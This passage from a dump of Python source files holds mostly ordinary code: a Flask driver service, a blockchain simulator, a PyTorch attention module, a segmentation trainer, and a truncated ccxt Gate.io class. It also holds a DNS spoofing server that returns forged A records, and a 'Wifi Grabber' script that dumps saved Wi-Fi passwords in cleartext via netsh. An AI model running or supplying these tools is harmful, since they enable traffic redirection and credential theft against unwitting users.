1000,dns.rdataclass.IN, dns.rdatatype.A, '4.4.45.4')\n# \tresp.answer.append(rrset)\n# \treturn resp\n\ndef std_ASPOOF_qry(msg):\n global spoof\n qs = msg.question\n DEBUGLOG(str(len(qs)) + ' questions.')\n iparpa = qs[0].to_text().split(' ', 1)[0]\n DEBUGLOG('Host: ' + iparpa)\n resp = make_response(qry=msg)\n\n for q in qs:\n qname = q.name.to_text()[:-1]\n DEBUGLOG('q name = ' + qname) + ' to resolve ' + spoof[qname]\n # \t rrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.facebook.com.')\n # \t\tresp.answer.append(rrset)\n # \t\trrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.yahoo.com.')\n # \t\tresp.answer.append(rrset)\n # \t\trrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.tuenti.com.')\n # \t\tresp.answer.append(rrset)\n # \t\trrset = dns.rrset.from_text(iparpa, 1000,dns.rdataclass.IN, dns.rdatatype.CNAME, 'www.twitter.com.')\n # \t\tresp.answer.append(rrset)\n rrset = dns.rrset.from_text(q.name, 1000, dns.rdataclass.IN, dns.rdatatype.A, spoof[qname])\n resp.answer.append(rrset)\n return resp\n\n\ndef make_response(qry=None, id=None, RCODE=0):\n if qry is None and id is None:\n raise Exception, 'bad use of make_response'\n if qry is None:\n resp = dns.message.Message(id)\n # QR = 1\n resp.flags |= dns.flags.QR\n if RCODE != 1:\n raise Exception, 'bad use of make_response'\n else:\n resp = dns.message.make_response(qry)\n resp.flags |= dns.flags.AA\n resp.flags |= dns.flags.RA\n resp.set_rcode(RCODE)\n return resp\n\n\nprocess_files()\nResolver.reset()\nResolver.read_resolv_conf(RESOLVCONF)\nsignal.signal(signal.SIGUSR1, SIGUSR1_handle)\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\ns.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\ns.bind(('', 53))\nif Forward:\n DEBUGLOG('DNS Forwarding activado....')\nelse:\n DEBUGLOG('DNS Forwarding desactivado....')\n\nDEBUGLOG('binded to UDP port 53.')\nserving_ids = []\nnoserv = True\n\nif ip1 is not None and ip2 is not None and Forward:\n sniff = ThreadSniffer()\n sniff.start()\n\nwhile True:\n if noserv:\n DEBUGLOG('waiting requests.')\n\n try:\n message, address = s.recvfrom(1024)\n noserv = True\n except socket.error as (code, msg):\n if code != errno.EINTR:\n raise\n\n if noserv:\n DEBUGLOG('serving a request.')\n requestHandler(address, message)\n"} {"ext": "py", "sha": "1a303a0002877f40cc5192228c1d3443ee8203e9", "content": "from xml.etree.ElementTree import TreeBuilder\nfrom app.models.entities.driver import Driver\nfrom app.models.entities.vehicle import Vehicle\nfrom app.models.result import Result\nfrom app.extensions import db\nfrom app.models.view.driver_view_model import DriverViewModel\n\nclass DriverService:\n def __init__(self) -> None:\n pass\n\n def insert_driver(self, driver: Driver) -> Result:\n result = driver.is_valid()\n if not result.success:\n return result\n \n driverAlreadyExistsByName = Driver.query.filter_by(name=driver.name).first()\n if driverAlreadyExistsByName:\n return Result(success=False, message=\"Ja existe um motorista cadastrado com o nome informado!\")\n\n driverAlreadyExistsByCPF = Driver.query.filter_by(cpf=driver.cpf).first()\n if driverAlreadyExistsByCPF:\n return Result(success=False, message=\"Ja existe um motorista cadastrado com o cpf informado!\")\n \n db.session.add(driver)\n db.session.commit()\n return Result(success= True, message= \"Motorista registrado com sucesso!\")\n \n def update_driver(self, current_driver: Driver, driver_view: DriverViewModel):\n current_driver.fill_update(driver_view)\n result = current_driver.is_valid()\n\n if not result.success:\n return result\n\n db.session.commit()\n return Result(success=True, message=\"Motorista atualizado com sucesso!\")\n\n def delete_driver(self, driver: Driver):\n vehicle = Vehicle.query.filter_by(driver_id=driver.id).first()\n if vehicle != None:\n return Result(success=False, message='''Existem veiculos cadastradados com este motorista!\n Delete antes os veiculos associados para deletar \n o motorista.''')\n\n db.session.delete(driver)\n db.session.commit()\n \n return Result(success=True, message=\"Motorista deletado com sucesso!\")\n\n\n def get_all(self):\n return Driver.query.all()"} {"ext": "py", "sha": "1a303a3f59492eed209748189cef41bdb68cdfa4", "content": "# This file is part of the Blockchain Data Trading Simulator\n# https://gitlab.com/MatthiasLohr/bdtsim\n#\n# Copyright 2021 Matthias Lohr \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport logging\nimport multiprocessing\nimport os\nfrom multiprocessing.pool import ApplyResult\nfrom typing import Any, Dict, Optional, Tuple\nfrom queue import Queue\n\nimport yaml\n\nfrom bdtsim.account import AccountFile\nfrom bdtsim.data_provider import DataProviderManager\nfrom bdtsim.environment import EnvironmentManager\nfrom bdtsim.protocol import ProtocolManager, DEFAULT_ASSET_PRICE\nfrom bdtsim.renderer import RendererManager\nfrom bdtsim.simulation import Simulation\nfrom bdtsim.simulation_result import SimulationResult, SimulationResultSerializer\nfrom bdtsim.util.types import to_bool\nfrom .command_manager import SubCommand\n\n\nDEFAULT_ENVIRONMENT_CONFIGURATION: Dict[str, Any] = {'name': 'PyEVM'}\nDEFAULT_DATA_PROVIDER_CONFIGURATION: Dict[str, Any] = {'name': 'RandomDataProvider'}\n\nlogger = logging.getLogger(__name__)\n\n\nclass BulkExecuteSubCommand(SubCommand):\n help = 'bulk execute simulations and renderings'\n\n def __init__(self, parser: argparse.ArgumentParser) -> None:\n super(BulkExecuteSubCommand, self).__init__(parser)\n parser.add_argument('bulk_configuration')\n parser.add_argument('-p', '--processes', type=int, default=multiprocessing.cpu_count())\n\n def __call__(self, args: argparse.Namespace) -> Optional[int]:\n with open(args.bulk_configuration, 'r') as fp:\n bulk_configuration = yaml.load(fp, Loader=yaml.SafeLoader)\n\n logger.info('creating process pool with %i processes' % args.processes)\n process_pool = multiprocessing.Pool(processes=args.processes)\n processes: Queue[ApplyResult[Any]] = Queue()\n\n simulation_configurations = bulk_configuration.get('simulations')\n if not isinstance(simulation_configurations, list):\n raise ValueError('simulations is not a list')\n\n renderer_configurations = bulk_configuration.get('renderers')\n if not isinstance(simulation_configurations, list):\n raise ValueError('renderers is not a list')\n\n target_directory = bulk_configuration.get('target_directory', 'bulk_output')\n os.makedirs(target_directory, exist_ok=True)\n\n def renderer_success_callback(params: Tuple[Dict[str, Any], Dict[str, Any], bytes]) -> None:\n sim_conf, renderer_conf, result = params\n logger.info('renderer succeeded (%s, %s)' % (str(sim_conf), str(renderer_conf)))\n with open(os.path.join(\n target_directory,\n self.get_output_filename(sim_conf, renderer_conf, suffix=renderer_conf.get('suffix'))\n ), 'wb') as f:\n f.write(result)\n\n def renderer_error_callback(error: BaseException) -> None:\n logger.warning('renderer error: %s' % str(error))\n\n def simulation_success_callback(params: Tuple[Dict[str, Any], SimulationResult]) -> None:\n local_simulation_configuration, result = params\n logger.info('simulation succeeded (%s)' % str(local_simulation_configuration))\n logger.debug('writing down result')\n with open(os.path.join(\n target_directory,\n self.get_output_filename(local_simulation_configuration, suffix='result')\n ), 'wb') as f:\n simulation_result_serializer = SimulationResultSerializer(\n compression=to_bool(bulk_configuration.get('output_compression', True)),\n b64encoding=to_bool(bulk_configuration.get('output_b64encoding', True))\n )\n f.write(simulation_result_serializer.serialize(result))\n\n logger.debug('scheduling renderers')\n for renderer_configuration in renderer_configurations:\n processes.put(process_pool.apply_async(\n func=self.run_renderer,\n kwds={\n 'simulation_configuration': local_simulation_configuration,\n 'renderer_configuration': renderer_configuration,\n 'simulation_result': result\n },\n callback=renderer_success_callback,\n error_callback=renderer_error_callback\n ))\n\n def simulation_error_callback(error: BaseException) -> None:\n logger.warning('simulation error callback called: %s' % str(error))\n\n logger.debug('scheduling simulations')\n for simulation_configuration in simulation_configurations:\n processes.put(process_pool.apply_async(\n func=self.run_simulation,\n kwds={\n 'simulation_configuration': simulation_configuration\n },\n callback=simulation_success_callback,\n error_callback=simulation_error_callback\n ))\n\n while not processes.empty():\n process = processes.get(block=True)\n process.wait()\n\n return 0\n\n @staticmethod\n def run_simulation(simulation_configuration: Dict[str, Any]) -> Tuple[Dict[str, Any], SimulationResult]:\n protocol_configuration = simulation_configuration.get('protocol')\n environment_configuration = simulation_configuration.get('environment')\n data_provider_configuration = simulation_configuration.get('data_provider')\n\n if protocol_configuration is None:\n raise ValueError('missing protocol configuration')\n if environment_configuration is None:\n environment_configuration = DEFAULT_ENVIRONMENT_CONFIGURATION\n if data_provider_configuration is None:\n data_provider_configuration = DEFAULT_DATA_PROVIDER_CONFIGURATION\n\n protocol = ProtocolManager.instantiate(\n name=protocol_configuration.get('name', ''),\n **protocol_configuration.get('parameters', {})\n )\n\n account_file = AccountFile(simulation_configuration.get('account_file'))\n\n environment = EnvironmentManager.instantiate(\n name=environment_configuration.get('name', ''),\n operator=account_file.operator,\n seller=account_file.seller,\n buyer=account_file.buyer,\n **environment_configuration.get('parameters', {})\n )\n\n data_provider = DataProviderManager.instantiate(\n name=data_provider_configuration.get('name', ''),\n **data_provider_configuration.get('parameters', {})\n )\n\n simulation = Simulation(\n protocol=protocol,\n environment=environment,\n data_provider=data_provider,\n operator=account_file.operator,\n seller=account_file.seller,\n buyer=account_file.buyer,\n protocol_path_coercion=simulation_configuration.get('protocol_path'),\n price=simulation_configuration.get('price', DEFAULT_ASSET_PRICE),\n )\n\n simulation_result = simulation.run()\n return simulation_configuration, simulation_result\n\n @staticmethod\n def run_renderer(simulation_configuration: Dict[str, Any], renderer_configuration: Dict[str, Any],\n simulation_result: SimulationResult) -> Tuple[Dict[str, Any], Dict[str, Any], bytes]:\n renderer = RendererManager.instantiate(\n name=renderer_configuration.get('name', ''),\n **renderer_configuration.get('parameters', {})\n )\n result = renderer.render(simulation_result)\n return simulation_configuration, renderer_configuration, result\n\n @staticmethod\n def get_output_filename(simulation_configuration: Dict[str, Any],\n renderer_configuration: Optional[Dict[str, Any]] = None,\n suffix: Optional[str] = None) -> str:\n def component2str(component_config: Dict[str, Any]) -> str:\n result = str(component_config.get('name'))\n parameter_lines = []\n for key, value in component_config.get('parameters', {}).items():\n parameter_lines.append('%s=%s' % (key, value))\n if len(parameter_lines):\n result += '-%s' % '-'.join(parameter_lines)\n return result\n\n output = '_'.join([\n component2str(simulation_configuration.get('protocol', {})),\n component2str(simulation_configuration.get('environment', {})),\n component2str(simulation_configuration.get('data_provider', DEFAULT_DATA_PROVIDER_CONFIGURATION))\n ])\n\n if renderer_configuration is not None:\n output += '_%s' % component2str(renderer_configuration)\n\n if suffix is not None:\n output += '.%s' % suffix\n\n return output\n"} {"ext": "py", "sha": "1a303a7e7556b807d8dabca004224fcf8f7c42f0", "content": "import pyross.tsi.deterministic\n\n"} {"ext": "py", "sha": "1a303bbba43054c984f5a7800187e46e2cf1cea5", "content": "\"\"\"\nRaspberry Pi tests.\n\"\"\"\n"} {"ext": "py", "sha": "1a303c7c062fd43b40ab19c623d931b57fd096f7", "content": "import torch\nimport torch.nn as nn\n\n\nclass ACM(nn.Module):\n # def __init__(self, in_channels, num_heads=32, orthogonal_loss=True):\n def __init__(self, in_channels, num_heads=8, orthogonal_loss=True):\n super(ACM, self).__init__()\n\n assert in_channels % num_heads == 0\n\n self.in_channels = in_channels\n self.num_heads = num_heads\n\n self.add_mod = AttendModule(self.in_channels, num_heads=num_heads)\n self.sub_mod = AttendModule(self.in_channels, num_heads=num_heads)\n self.mul_mod = ModulateModule(channel=self.in_channels, num_groups=num_heads, compressions=2)\n\n self.orthogonal_loss = orthogonal_loss\n\n self.init_parameters()\n\n def init_parameters(self):\n if self.add_mod is not None:\n self.add_mod.init_parameters()\n if self.sub_mod is not None:\n self.sub_mod.init_parameters()\n if self.mul_mod is not None:\n self.mul_mod.init_parameters()\n\n def forward(self, x):\n\n mu = x.mean([2, 3], keepdim=True)\n x_mu = x - mu\n\n # creates multipying feature\n mul_feature = self.mul_mod(mu) # P\n\n # creates add or sub feature\n add_feature = self.add_mod(x_mu) # K\n\n # creates add or sub feature\n sub_feature = self.sub_mod(x_mu) # Q\n\n y = (x + add_feature - sub_feature) * mul_feature\n\n if self.orthogonal_loss:\n dp = torch.mean(add_feature * sub_feature, dim=1, keepdim=True)\n return y, dp\n else:\n return y\n\n\nclass AttendModule(nn.Module):\n\n def __init__(self, in_channels, num_heads=4):\n super(AttendModule, self).__init__()\n\n self.num_heads = int(num_heads)\n self.in_channels = in_channels\n self.num_c_per_head = self.in_channels // self.num_heads\n assert self.in_channels % self.num_heads == 0\n\n self.map_gen = nn.Sequential(\n nn.Conv2d(in_channels, num_heads, kernel_size=1, stride=1, padding=0, bias=True, groups=num_heads)\n )\n\n self.normalize = nn.Softmax(dim=2)\n self.return_weight = False\n\n def init_parameters(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n nn.init.constant_(m.bias, 0.0)\n\n def batch_weighted_avg(self, xhats, weights):\n\n b, c, h, w = xhats.shape\n # xhat reshape\n xhats_reshape = xhats.view(b * self.num_heads, self.num_c_per_head, h, w)\n xhats_reshape = xhats_reshape.view(b * self.num_heads, self.num_c_per_head, h * w)\n\n # weight reshape\n weights_reshape = weights.view(b * self.num_heads, 1, h, w)\n weights_reshape = weights_reshape.view(b * self.num_heads, 1, h * w)\n\n weights_normalized = self.normalize(weights_reshape)\n weights_normalized = weights_normalized.transpose(1, 2)\n\n mus = torch.bmm(xhats_reshape, weights_normalized)\n mus = mus.view(b, self.num_heads * self.num_c_per_head, 1, 1)\n\n return mus, weights_normalized\n\n def forward(self, x):\n\n b, c, h, w = x.shape\n\n weights = self.map_gen(x)\n\n mus, weights_normalized = self.batch_weighted_avg(x, weights)\n\n if self.return_weight:\n weights_normalized = weights_normalized.view(b, self.num_heads, h * w, 1)\n weights_normalized = weights_normalized.squeeze(-1)\n\n weights_normalized = weights_normalized.view(b, self.num_heads, h, w)\n weights_splitted = torch.split(weights_normalized, 1, 1)\n return mus, weights_splitted\n\n return mus\n\n\nclass ModulateModule(nn.Module):\n\n def __init__(self, channel, num_groups=32, compressions=2):\n super(ModulateModule, self).__init__()\n self.feature_gen = nn.Sequential(\n nn.Conv2d(channel, channel//compressions, kernel_size=1, stride=1, padding=0, bias=True, groups=num_groups),\n nn.ReLU(inplace=True),\n nn.Conv2d(channel//compressions, channel, kernel_size=1, stride=1, padding=0, bias=True, groups=num_groups),\n nn.Sigmoid()\n )\n\n def init_parameters(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')\n nn.init.constant_(m.bias, 0.0)\n\n def forward(self, x):\n y = self.feature_gen(x)\n return y\n\n\nif __name__ == '__main__':\n\n x1 = torch.randn(256 * 20 * 20 * 5).view(5, 256, 20, 20).float()\n acm = ACM(num_heads=32, in_channels=256, orthogonal_loss=True)\n acm.init_parameters()\n y, dp = acm(x1)\n print(y.shape)\n print(dp.shape)\n\n # ACM without orthogonal loss\n acm = ACM(num_heads=32, in_channels=256, orthogonal_loss=False)\n acm.init_parameters()\n y = acm(x1)\n print(y.shape)\n"} {"ext": "py", "sha": "1a303d137c88cb611703c2d83001fd5964a1e2d4", "content": "import subprocess\nimport time\nimport os\n\nlocaltime = time.asctime( time.localtime(time.time()))\ndata = subprocess.check_output(['netsh','wlan','show','profiles']).decode('utf-8').split('\\n')\nprofiles = [i.split(\":\")[1][1:-1] for i in data if \"All User Profile\" in i]\nfile = open(\"result.txt\", \"a\")\nprint(\"\\n[+] Wifi Grabber: \" + localtime + \"\\n\")\nfile.write(\"\\n[+] Wifi Grabber: \" + localtime + \"\\n\")\nprint(\"========================================================\",file=file)\nprint(localtime, file=file)\nprint(\"========================================================\",file=file)\nfile.close\nfor i in profiles:\n results = subprocess.check_output(['netsh','wlan','show','profile',i,\n 'key=clear']).decode(\"utf-8\").split('\\n')\n results = [b.split(\":\")[1][1:-1] for b in results if \"Key Content\" in b]\n try:\n print(\"{:<30} | {:<}\".format(i, results[0]),file=file)\n file.close\n except IndexError:\n print(\"{:<30} | {:<}\".format(i, \"\"))\n\ntime.sleep(3)\nexit(code=True)\n"} {"ext": "py", "sha": "1a303e265fe5afb1b4c1ab347327b59041b58f21", "content": "###########################################################################\n# Created by: Hang Zhang\n# Email: zhang.hang@rutgers.edu\n# Copyright (c) 2017\n###########################################################################\n\nimport os, sys\nBASE_DIR = os.path.dirname(os.path.dirname(os.getcwd()))\nsys.path.append(BASE_DIR)\nimport yaml\nimport argparse\nimport numpy as np\nfrom addict import Dict\n\nimport torch\nimport torch.nn as nn\nfrom torch.utils import data\nfrom tensorboardX import SummaryWriter\nimport torchvision.transforms as transform\nfrom torch.nn.parallel.scatter_gather import gather\n\nimport encoding.utils as utils\nfrom encoding.nn import SegmentationLosses, SyncBatchNorm\nfrom encoding.parallel import DataParallelModel, DataParallelCriterion\nfrom encoding.datasets import get_dataset\nfrom encoding.models import get_segmentation_model\nCONFIG_PATH = './results/config.yaml'\nSMY_PATH = os.path.dirname(CONFIG_PATH)\nGPUS = [0, 1]\n\n# model settings\nparser = argparse.ArgumentParser(description='model specification')\nparser.add_argument('--with_att', action='store_true', default= False, help='whether use attention to fuse rgb and dep')\nparser.add_argument('--att_type', type=str, default='AG2', help='Attention type to fuse rgb and dep')\nsettings= parser.parse_args()\nprint('settings attention:{} attention type:{}'.format(settings.with_att, settings.att_type))\n\n\nclass Trainer():\n def __init__(self, args):\n self.args = args\n # data transforms\n input_transform = transform.Compose([\n transform.ToTensor(), # convert RGB [0,255] to FloatTensor in range [0, 1]\n transform.Normalize([.485, .456, .406], [.229, .224, .225])]) # mean and std based on imageNet\n dep_transform = transform.Compose([\n transform.ToTensor(),\n transform.Normalize(mean=[0.2798], std=[0.1387]) # mean and std for depth\n ])\n # dataset\n data_kwargs = {'transform': input_transform, 'dep_transform': dep_transform,\n 'base_size': args.base_size, 'crop_size': args.crop_size}\n trainset = get_dataset(args.dataset, split=args.train_split, mode='train', **data_kwargs)\n testset = get_dataset(args.dataset, split='val', mode='val', **data_kwargs)\n # dataloader\n kwargs = {'num_workers': args.workers, 'pin_memory': True} if args.cuda else {}\n self.trainloader = data.DataLoader(trainset, batch_size=args.batch_size, drop_last=True, shuffle=True, **kwargs)\n self.valloader = data.DataLoader(testset, batch_size=args.batch_size, drop_last=False, shuffle=False, **kwargs)\n self.nclass = trainset.num_class\n\n # model and params\n model = get_segmentation_model(args.model, dataset=args.dataset, backbone=args.backbone, pretrained=True,\n root='../../encoding/models/pretrain', n_features=256,\n with_att=settings.with_att, att_type=settings.att_type,\n )\n\n print(model)\n # optimizer using different LR\n base_ids = list(map(id, model.base.parameters()))\n base_dep_ids = list(map(id, model.dep_base.parameters()))\n base_params = filter(lambda p: id(p) in base_ids + base_dep_ids, model.parameters())\n other_params = filter(lambda p: id(p) not in base_ids + base_dep_ids, model.parameters())\n self.optimizer = torch.optim.SGD([{'params': base_params, 'lr': args.lr},\n {'params': other_params, 'lr': args.lr * 10}],\n lr=args.lr, momentum=args.momentum, weight_decay=args.weight_decay)\n\n # criterions\n self.criterion = SegmentationLosses(se_loss=args.se_loss,\n aux=args.aux,\n nclass=self.nclass,\n se_weight=args.se_weight,\n aux_weight=args.aux_weight)\n # lr scheduler\n self.scheduler = utils.LR_Scheduler_Head(args.lr_scheduler, args.lr, args.epochs,\n iters_per_epoch=len(self.trainloader), warmup_epochs=10)\n self.best_pred = 0.0\n\n # using cuda\n self.device = torch.device(\"cuda:0\" if args.cuda else \"cpu\")\n if args.cuda:\n if torch.cuda.device_count() > 1:\n print(\"Let's use\", torch.cuda.device_count(), \"GPUs!\") # [30,xxx]->[10,...],[10,...],[10,...] on 3 GPUs\n model = nn.DataParallel(model, device_ids=GPUS)\n self.model = model.to(self.device)\n\n # for writing summary\n path = \"/\".join((\"{}-{}\".format(*i) for i in settings.__dict__.items()))\n self.writer = SummaryWriter(os.path.join(SMY_PATH, path))\n # resuming checkpoint\n if args.resume is not None and args.resume != 'None':\n if not os.path.isfile(args.resume):\n raise RuntimeError(\"=> no checkpoint found at '{}'\".format(args.resume))\n checkpoint = torch.load(args.resume)\n args.start_epoch = checkpoint['epoch']\n if args.cuda:\n self.model.module.load_state_dict(checkpoint['state_dict'])\n else:\n self.model.load_state_dict(checkpoint['state_dict'])\n if not args.ft:\n self.optimizer.load_state_dict(checkpoint['optimizer'])\n self.best_pred = checkpoint['best_pred']\n print(\"=> loaded checkpoint '{}' (epoch {})\".format(args.resume, checkpoint['epoch']))\n # clear start epoch if fine-tuning\n if args.ft:\n args.start_epoch = 0\n\n def training(self, epoch):\n train_loss = 0.0\n self.model.train()\n\n total_inter, total_union, total_correct, total_label, total_loss = 0, 0, 0, 0, 0\n for i, (image, dep, target) in enumerate(self.trainloader):\n image, dep, target = image.to(self.device), dep.to(self.device), target.to(self.device)\n self.scheduler(self.optimizer, i, epoch, self.best_pred)\n self.optimizer.zero_grad()\n outputs = self.model(image, dep)\n loss = self.criterion(outputs, target)\n loss.backward()\n self.optimizer.step()\n\n correct, labeled = utils.batch_pix_accuracy(outputs.data, target)\n inter, union = utils.batch_intersection_union(outputs.data, target, self.nclass)\n total_correct += correct\n total_label += labeled\n total_inter += inter\n total_union += union\n train_loss += loss.item()\n\n if (i+1) % 50 == 0:\n print('epoch {}, step {}, loss {}'.format(epoch + 1, i + 1, train_loss / 50))\n self.writer.add_scalar('train_loss', train_loss / 50, epoch * len(self.trainloader) + i)\n train_loss = 0.0\n pixAcc = 1.0 * total_correct / (np.spacing(1) + total_label)\n IOU = 1.0 * total_inter / (np.spacing(1) + total_union)\n mIOU = IOU.mean()\n print('epoch {}, pixel Acc {}, mean IOU {}'.format(epoch + 1, pixAcc, mIOU))\n self.writer.add_scalar(\"mean_iou/train\", mIOU, epoch)\n self.writer.add_scalar(\"pixel accuracy/train\", pixAcc, epoch)\n\n def train_n_evaluate(self):\n\n for epoch in range(self.args.epochs):\n # run on one epoch\n print(\"\\n===============train epoch {}/{} ==========================\\n\".format(epoch, self.args.epochs))\n\n # one full pass over the train set\n self.training(epoch)\n\n # evaluate for one epoch on the validation set\n print('\\n===============start testing, training epoch {}\\n'.format(epoch))\n pixAcc, mIOU, loss = self.validation(epoch)\n print('evaluation pixel acc {}, mean IOU {}, loss {}'.format(pixAcc, mIOU, loss))\n\n # save the best model\n is_best = False\n new_pred = (pixAcc + mIOU) / 2\n if new_pred > self.best_pred:\n is_best = True\n self.best_pred = new_pred\n utils.save_checkpoint({'epoch': epoch + 1,\n 'state_dict': self.model.module.state_dict(),\n 'optimizer': self.optimizer.state_dict(),\n 'best_pred': self.best_pred}, self.args, is_best)\n\n def validation(self, epoch):\n # Fast test during the training\n def eval_batch(model, image, dep, target):\n # model, image, target already moved to gpus\n pred = model(image, dep)\n loss = self.criterion(pred, target)\n correct, labeled = utils.batch_pix_accuracy(pred.data, target)\n inter, union = utils.batch_intersection_union(pred.data, target, self.nclass)\n return correct, labeled, inter, union, loss\n\n self.model.eval()\n total_inter, total_union, total_correct, total_label, total_loss = 0, 0, 0, 0, 0\n for i, (image, dep, target) in enumerate(self.valloader):\n image, dep, target = image.to(self.device), dep.to(self.device), target.to(self.device)\n with torch.no_grad():\n correct, labeled, inter, union, loss = eval_batch(self.model, image, dep, target)\n\n total_correct += correct\n total_label += labeled\n total_inter += inter\n total_union += union\n total_loss += loss.item()\n pixAcc = 1.0 * total_correct / (np.spacing(1) + total_label)\n IOU = 1.0 * total_inter / (np.spacing(1) + total_union)\n mIOU = IOU.mean()\n\n if i % 40 == 0:\n print('eval mean IOU {}'.format(mIOU))\n loss = total_loss / len(self.valloader)\n\n self.writer.add_scalar(\"mean_iou/val\", mIOU, epoch)\n self.writer.add_scalar(\"pixel accuracy/val\", pixAcc, epoch)\n\n return pixAcc, mIOU, loss\n\n\nif __name__ == \"__main__\":\n print(\"-------mark program start----------\")\n # configuration\n args = Dict(yaml.safe_load(open(CONFIG_PATH)))\n args.cuda = (args.use_cuda and torch.cuda.is_available())\n args.resume = None if args.resume=='None' else args.resume\n torch.manual_seed(args.seed)\n\n\n trainer = Trainer(args)\n # import pdb; pdb.set_trace()\n print('Starting Epoch:', trainer.args.start_epoch)\n print('Total Epoches:', trainer.args.epochs)\n trainer.train_n_evaluate()\n\n\n"} {"ext": "py", "sha": "1a303ec63cfa30e4d3af946a584e1b191fd1c6c5", "content": "# -*- coding: utf-8 -*-\n\n# PLEASE DO NOT EDIT THIS FILE, IT IS GENERATED AND WILL BE OVERWRITTEN:\n# https://github.com/ccxt/ccxt/blob/master/CONTRIBUTING.md#how-to-contribute-code\n\nfrom ccxt.base.exchange import Exchange\nimport hashlib\nfrom ccxt.base.errors import ExchangeError\nfrom ccxt.base.errors import AuthenticationError\nfrom ccxt.base.errors import PermissionDenied\nfrom ccxt.base.errors import AccountSuspended\nfrom ccxt.base.errors import ArgumentsRequired\nfrom ccxt.base.errors import BadRequest\nfrom ccxt.base.errors import BadSymbol\nfrom ccxt.base.errors import InsufficientFunds\nfrom ccxt.base.errors import InvalidOrder\nfrom ccxt.base.errors import OrderNotFound\nfrom ccxt.base.errors import RateLimitExceeded\nfrom ccxt.base.errors import ExchangeNotAvailable\nfrom ccxt.base.decimal_to_precision import TICK_SIZE\nfrom ccxt.base.precise import Precise\n\n\nclass gateio(Exchange):\n\n def describe(self):\n return self.deep_extend(super(gateio, self).describe(), {\n 'id': 'gateio',\n 'name': 'Gate.io',\n 'countries': ['KR'],\n 'rateLimit': 10 / 3, # 300 requests per second or 3.33ms\n 'version': 'v4',\n 'certified': True,\n 'pro': True,\n 'urls': {\n 'logo': 'https://user-images.githubusercontent.com/1294454/31784029-0313c702-b509-11e7-9ccc-bc0da6a0e435.jpg',\n 'doc': 'https://www.gate.io/docs/apiv4/en/index.html',\n 'www': 'https://gate.io/',\n 'api': {\n 'public': 'https://api.gateio.ws/api/v4',\n 'private': 'https://api.gateio.ws/api/v4',\n },\n 'referral': {\n 'url': 'https://www.gate.io/ref/2436035',\n 'discount': 0.2,\n },\n },\n 'has': {\n 'cancelOrder': True,\n 'createMarketOrder': False,\n 'createOrder': True,\n 'fetchBalance': True,\n 'fetchClosedOrders': True,\n 'fetchCurrencies': True,\n 'fetchDeposits': True,\n 'fetchFundingRate': True,\n 'fetchFundingRateHistory': True,\n 'fetchFundingRates': True,\n 'fetchIndexOHLCV': True,\n 'fetchMarkets': True,\n 'fetchMarkOHLCV': True,\n 'fetchMyTrades': True,\n 'fetchOHLCV': True,\n 'fetchOpenOrders': True,\n 'fetchOrder': True,\n 'fetchPremiumIndexOHLCV': False,\n 'fetchTicker': True,\n 'fetchTickers': True,\n 'fetchTime': False,\n 'fetchTrades': True,\n 'fetchWithdrawals': True,\n 'transfer': True,\n 'withdraw': True,\n },\n 'api': {\n 'public': {\n 'spot': {\n 'get': {\n 'currencies': 1,\n 'currencies/{currency}': 1,\n 'currency_pairs': 1,\n 'currency_pairs/{currency_pair}': 1,\n 'tickers': 1,\n 'order_book': 1,\n 'trades': 1,\n 'candlesticks': 1,\n },\n },\n 'margin': {\n 'get': {\n 'currency_pairs': 1,\n 'currency_pairs/{currency_pair}': 1,\n 'cross/currencies': 1,\n 'cross/currencies/{currency}': 1,\n },\n },\n 'futures': {\n 'get': {\n '{settle}/contracts': 1.5,\n '{settle}/contracts/{contract}': 1.5,\n '{settle}/order_book': 1.5,\n '{settle}/trades': 1.5,\n '{settle}/candlesticks': 1.5,\n '{settle}/tickers': 1.5,\n '{settle}/funding_rate': 1.5,\n '{settle}/insurance': 1.5,\n '{settle}/contract_stats': 1.5,\n '{settle}/liq_orders': 1.5,\n },\n },\n 'delivery': {\n 'get': {\n '{settle}/contracts': 1.5,\n '{settle}/contracts/{contract}': 1.5,\n '{settle}/order_book': 1.5,\n '{settle}/trades': 1.5,\n '{settle}/candlesticks': 1.5,\n '{settle}/tickers': 1.5,\n '{settle}/insurance': 1.5,\n },\n },\n },\n 'private': {\n 'withdrawals': {\n 'post': {\n '': 3000, # 3000 = 10 seconds\n },\n 'delete': {\n '{withdrawal_id}': 300,\n },\n },\n 'wallet': {\n 'get': {\n 'deposit_address': 300,\n 'withdrawals': 300,\n 'deposits': 300,\n 'sub_account_transfers': 300,\n 'withdraw_status': 300,\n 'sub_account_balances': 300,\n 'fee': 300,\n },\n 'post': {\n 'transfers': 300,\n 'sub_account_transfers': 300,\n },\n },\n 'spot': {\n 'get': {\n 'accounts': 1,\n 'open_orders': 1,\n 'orders': 1,\n 'orders/{order_id}': 1,\n 'my_trades': 1,\n 'price_orders': 1,\n 'price_orders/{order_id}': 1,\n },\n 'post': {\n 'batch_orders': 1,\n 'orders': 1,\n 'cancel_batch_orders': 1,\n 'price_orders': 1,\n },\n 'delete': {\n 'orders': 1,\n 'orders/{order_id}': 1,\n 'price_orders': 1,\n 'price_orders/{order_id}': 1,\n },\n },\n 'margin': {\n 'get': {\n 'accounts': 1.5,\n 'account_book': 1.5,\n 'funding_accounts': 1.5,\n 'loans': 1.5,\n 'loans/{loan_id}': 1.5,\n 'loans/{loan_id}/repayment': 1.5,\n 'loan_records': 1.5,\n 'loan_records/{load_record_id}': 1.5,\n 'auto_repay': 1.5,\n 'transferable': 1.5,\n 'cross/accounts': 1.5,\n 'cross/account_book': 